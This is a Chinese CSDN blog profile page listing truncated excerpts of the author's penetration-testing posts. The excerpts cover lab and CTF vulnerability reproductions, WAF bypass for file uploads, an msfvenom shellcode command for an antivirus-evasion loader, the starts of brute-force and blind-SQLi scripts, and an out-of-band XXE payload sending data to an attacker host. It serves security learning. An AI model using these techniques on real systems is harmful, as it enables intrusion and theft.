sGanYu
码龄1年
  • 207,357
    被访问
  • 116
    原创
  • 19,221
    排名
  • 461
    粉丝
关注
提问 私信

个人简介:行百里者半于九十

  • 加入CSDN时间: 2021-05-30
博客简介:

sGanYu

博客描述:
总有一天你的负担终将变成礼物,你受的苦将照亮你的路
查看详细资料
  • 5
    领奖
    总分 1,346 当月 66
个人成就
  • 获得183次点赞
  • 内容获得69次评论
  • 获得314次收藏
创作历程
  • 27篇
    2022年
  • 89篇
    2021年
成就勋章
TA的专栏
  • 渗透测试
    79篇
  • KALI
    23篇
  • Python
    21篇
  • MSF
    19篇
  • nmap
    8篇
  • RCE
    10篇
  • 文件上传
    6篇
  • SQL注入
    13篇
  • burpsuite
    14篇
  • ctfhub
    10篇
  • BUUCTF
    29篇
  • PHP反序列化
    4篇
  • xss漏洞
    3篇
  • 攻防世界
    12篇
兴趣领域 设置
  • Python
    python
  • 安全
    系统安全web安全
  • 最近
  • 文章
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

慢速拒绝服务攻击slowhttptest测试

安装openssl命令:apt-get install openssl​安装libssl-dev命令:apt-get install libssl-dev​如果出现以上的图,首先安装update安装update命令:apt-get update​再执行apt-get install libssl-dev​安装slowhttptestgit clone https://github.com/shekyan/slowhttptest.git cd slowhttptest./configure makema
原创
发布博客 2022.06.02 ·
170 阅读 ·
0 点赞 ·
2 评论

KALI安装Pycharm

由于直接在KALI中下载Pycharm速度往往不太理想,所以可以在本机内提前安装,再传输进KALIPycharm下载地址:Download PyCharm: Python IDE for Professional Developers by JetBrainshttps://www.jetbrains.com/pycharm/download/#section=windows目前,Pycharm提供了三种不同操作系统的版本,这里我们选择KALI作为操作系统,所以点击Linux
原创
发布博客 2022.05.23 ·
379 阅读 ·
1 点赞 ·
1 评论

[CISCN2019 华北赛区 Day1 Web2]ikun以一道例题从JWT安全到Pickle反序列化

这道题前面几关还是挺简单的,主要重点是JWT安全和Pickle反序列化的问题,所以前面的关卡就简单描述一下步骤先去注册一个账户注册完账户后,我们就来到了第一关,刚开始本来想注册一个admin用户的,没想到已经被注册了,那么我猜接下来的内容会和admin有关了这里有一个提示,开局给了我们1000块,让我们去购买lv6,当前链接是http://29e104e9-b299-4014-b700-cc0b3892187b.node4.buuoj.cn:81/shop?page=2,每点击一次下一页,p
原创
发布博客 2022.05.22 ·
198 阅读 ·
0 点赞 ·
0 评论

Monstra CMS文件上传(vulfocus/monstra_cve_2020_13384的writeup)

环境:Vulfocus 漏洞威胁分析平台writeup开启环境随意注册一个用户,如果说记性不好的话(bushiwo)可以把账户名密码都设置为admin,邮箱随意直奔主题漏洞路径:http://123.58.236.76:48412/admin/ ,如果是和我一样注册的话,这里用户名和密码都是admin点击上传文件第一步,上传所需文件,第二步,抓包 注意:程序不允许'html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'p.
原创
发布博客 2022.05.04 ·
1299 阅读 ·
0 点赞 ·
0 评论

Django JSONField SQL注入漏洞 复现 & 原理分析

关于这个漏洞前几天看了很多的文章,其实大部分payload是一样的,都是如何去构造,或者去命令执行复现一下,我一开始也是这样去做的,但是这个漏洞是怎么形成的,对我来说可能一知半解,或者说完全不了解,在后面学习的过程中感觉吃力又去补习了别的知识,比如Django的两个基类,ArrayField、JSONField,Json.objects.filter()和QuerySet相关的知识,包括ORM注入等等1/漏洞原理PostgreSQL、SQLite3、MySQL、Oracle,在大部分情况下,以上四种
原创
发布博客 2022.05.04 ·
1409 阅读 ·
0 点赞 ·
0 评论

文件上传绕过安全狗的一些方法

目录安全狗的安装垃圾数据绕过:数据包溢出绕过:值匹配""的内容,后跟.php:多个filename,绕过匹配:白名单绕过:测试工具:Burpsuite,安全狗测试网站:在没有安全狗的情况下,上传1.Php,以文件大小写后缀上传,是不会被拦截的,如下图安全狗的安装安全狗地址:网站安全狗-网站安全防护,防后门|防SQL注入|防CC攻击|网马查杀|防篡改,选择windows操作系统,Apache版本选择4.0,一直默认安装即可在默认安装时,会跳出需要填写关于Ap
原创
发布博客 2022.04.28 ·
1395 阅读 ·
1 点赞 ·
2 评论

[CVE-2022-22965]Spring远程代码执行漏洞复现

漏洞概述(级别:高危)续上一次Log4j2后,于2022年03月29日,Spring官方发布了Spring框架远程命令执行漏洞公告(CNVD-2022-23942、CVE-2022-22965)攻击者可以通过构造恶意请求来利用这些漏洞,从而造成任意代码执行,未经身份验证的攻击者可以使用此漏洞进行远程任意代码执行,该漏洞广泛存在于Spring框架以及衍生的框架中,JDK 9.0及以上版本会受到此漏洞影响FOFA语法app="APACHE-Tomcat" || app="vmware-Sprin
原创
发布博客 2022.04.26 ·
1238 阅读 ·
0 点赞 ·
2 评论

74CMS模版注入漏洞复现

骑士cms人才系统,是一项基于php+mysql为核心开发的一套免费+开源业人才软件系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才系统已成国内同类软件中的最好用的人才系统。该漏洞影响版本: CMS < 6.0.48漏洞复现url:http://目标IP地址/index.php?m=home&a=assign_resume_tpl以post方.
原创
发布博客 2022.04.15 ·
592 阅读 ·
0 点赞 ·
0 评论

Python免杀脚本生成.exe(过火绒过联想没过360)

方法:使用内存加载shellcodemsfvenom -p windows/x64/exec CMD='calc.exe' -f py -b '\x00\x0a'【这里执行弹出计算器的命令操作】-p 用于指定payloadcalc.exe用于执行弹出计算机操作-f 用于指定生成的shellcode的编译语言-b 用于禁止生成shellcode中易出现的被查杀软件检测的字符串-e 可以选择相应的编码器在pycharm内运行如下脚本import ctypesfrom.
原创
发布博客 2022.04.06 ·
2934 阅读 ·
3 点赞 ·
0 评论

FTP口令破解脚本编写

import ftplibimport optparseimport threading# 使用匿名用户进行登录,如果登录成功则写入FtpSuccess.txt文件def CheckAnonymous(FTPserver): try: print('[-] checking user [anonymous] and password [anonymous]') f = ftplib.FTP(FTPserver) # 对主机发起连接,端口默认 .
原创
发布博客 2022.04.05 ·
617 阅读 ·
1 点赞 ·
0 评论

Pikachu靶场Login多线程爆破脚本编写

注意:需要在同目录下创建两个字典,一个是users.txt,一个是passwds.txt,运行该脚本时会从这两个文件内读取用户名与密码import osimport threadingimport requests# 定义分块大小BLOCK_SIZE = 800def pertition(ls, size): return [ls[i:i + size] for i in range(0, len(ls), size)]# 创建子线程任务类class Thread..
原创
发布博客 2022.03.26 ·
1518 阅读 ·
0 点赞 ·
0 评论

时间盲注脚本(附带注释)

参考python安全攻防时间盲注,自己修改了一些内容,加入了异常处理防止乱跑# -*- coding: UTF-8 -*-import requestsimport timeDBName = "" # 数据库名的变量DBTables = []DBColumns = []DBData = {}requests.adapters.DEFAULT_RETRIES = 10conn = requests.session()conn.keep_alive = False # 设置重连
原创
发布博客 2022.03.22 ·
1465 阅读 ·
1 点赞 ·
0 评论

外部实体注入(无回显类)复现

思路:与有回显的外部实体注入的区别在于,攻击的payload无法直接读取敏感信息。攻击者先将请求发送至目标服务器,目标服务器解析请求,读取192.168.200.1内的恶意DTD,并执行,将结果作为参数来访问192.168.200.1上的http服务,攻击者通过访问192.168.200.1的http记录得到结果首先在192.168.200.1上创建文件名为evil.xml内容为<!ENTITY % payload "<!ENTITY &#x25; send..
原创
发布博客 2022.03.19 ·
849 阅读 ·
0 点赞 ·
0 评论

实现UDP、TCP的多线程端口探测(包含TOP-50-1000)

# 多线程扫描工具import optparseimport queueimport socketimport sysimport threading# 定义端口扫描类# 要想创建一个线程对象,只要继承类threading.Thread,然后在__ init__里边调用threading.Thread.__init__()方法class PortScaner(threading.Thread): def __init__(self, ip, portqueue, timeout.
原创
发布博客 2022.03.19 ·
1644 阅读 ·
1 点赞 ·
0 评论

Redis未授权访问漏洞是什么?如何复现(包括整理出在复现过程中遇到的各种问题)+编写扫描检测脚本

目录Redis未授权访问漏洞原理环境配通常来说置:CentOS下安装Redis手工未授权访问验证利用方式在攻击机中使用ssh免密登陆靶机利用漏洞写入webshell编写脚本检测未授权访问漏洞可以理解为安全配置不当、在需要进行权限认证处未对当前用户进行权限识别,导致攻击者在没有获取到登录权限或未授权的情况下,对目标进行操作或者被信息泄露常见的未授权漏洞:Redis 未授权访问漏洞MongoDB 未授权访问漏洞JBOSS 未授权访问漏洞VNC 未授权访问漏洞宝塔
原创
发布博客 2022.03.19 ·
2351 阅读 ·
1 点赞 ·
2 评论

ZoomEye搜索引擎语法与脚本检索

全球网站都是由各种组件组成,比如用的哪种操作系统、哪种Web容器、什么服务端语言、什么Web应用等等,而ZoomEye是一个面向网络空间的搜索引擎,它允许使用公网设备指纹检索和web指纹检索web指纹检索语法web指纹识别包括应用名、版本、前后端框架、服务端语言与操作系统、容器、数据库等等语法 描述 示例 app:组件名 目标组件名称 app:"Apache httpd" ver:组件版本 目标组件版本号 ver:'2.2.17' site:网站域
原创
发布博客 2022.03.17 ·
1220 阅读 ·
0 点赞 ·
0 评论

[python]多线程socket端口探测(包含top50-1000)

# 多线程扫描工具import optparseimport queueimport socketimport sysimport threading# 定义端口扫描类# 要想创建一个线程对象,只要继承类threading.Thread,然后在__ init__里边调用threading.Thread.__init__()方法class PortScaner(threading.Thread): def __init__(self, ip, portqueue, timeout.
原创
发布博客 2022.03.16 ·
4587 阅读 ·
1 点赞 ·
0 评论

Nmap库ICMP主机探测

import optparseimport refrom nmap import nmapdef Nmapscan(targetIP): # 实例化PortScanner对象 nm = nmap.PortScanner() try: # hosts为目标ip地址,argusments为nmap的扫描参数 # -sn:使用ping进行扫描 # -PE:使用ICMP的echo请求包 result = nm.sca.
原创
发布博客 2022.03.15 ·
1215 阅读 ·
0 点赞 ·
0 评论

可执行文件的转换(.py转.exe),PyInstaller解决生成的文件为.exe.notanexecutable等报错

安装PyInstallerpip install pyinstaller准备一个.py文件和一个图片,在两个文件所在的文件夹下运行cmd进行合成-F 表示生成单个可执行文件exe。-w 表示去掉控制台窗口,即点击exe运行时不会出现黑窗。-i 表示可执行文件的图标结果爆出如下错误ValueError: Received icon path 'M:\python文件写入测试\exe合成\2022.png' which exists but is not in the c
原创
发布博客 2022.03.08 ·
2165 阅读 ·
4 点赞 ·
1 评论

【Python】异常处理?tryexcept用法详解、使用自定义异常处理类,进行错误日志的自动生成与写入

目录异常处理tryexcept用法详解多分支处理异常类通用异常类Exception多分支异常类+通用异常类finally主动抛出异常使用自定义异常处理类进行日志的写入异常处理俗话说天有不测风云,对于天气的观测来说会有很多的变数,那么对于程序来说也会有相对的异常,那么什么叫异常处理呢?就比如如果我定义了一个列表,那么我去获取列表内的一个不存在的索引的时候,就会报错(异常),为了增强程序的健壮性,我们也需要考虑异常处理的内容以‘获取列表内的一个不存在的索引’为例:
原创
发布博客 2022.03.07 ·
1059 阅读 ·
0 点赞 ·
0 评论
加载更多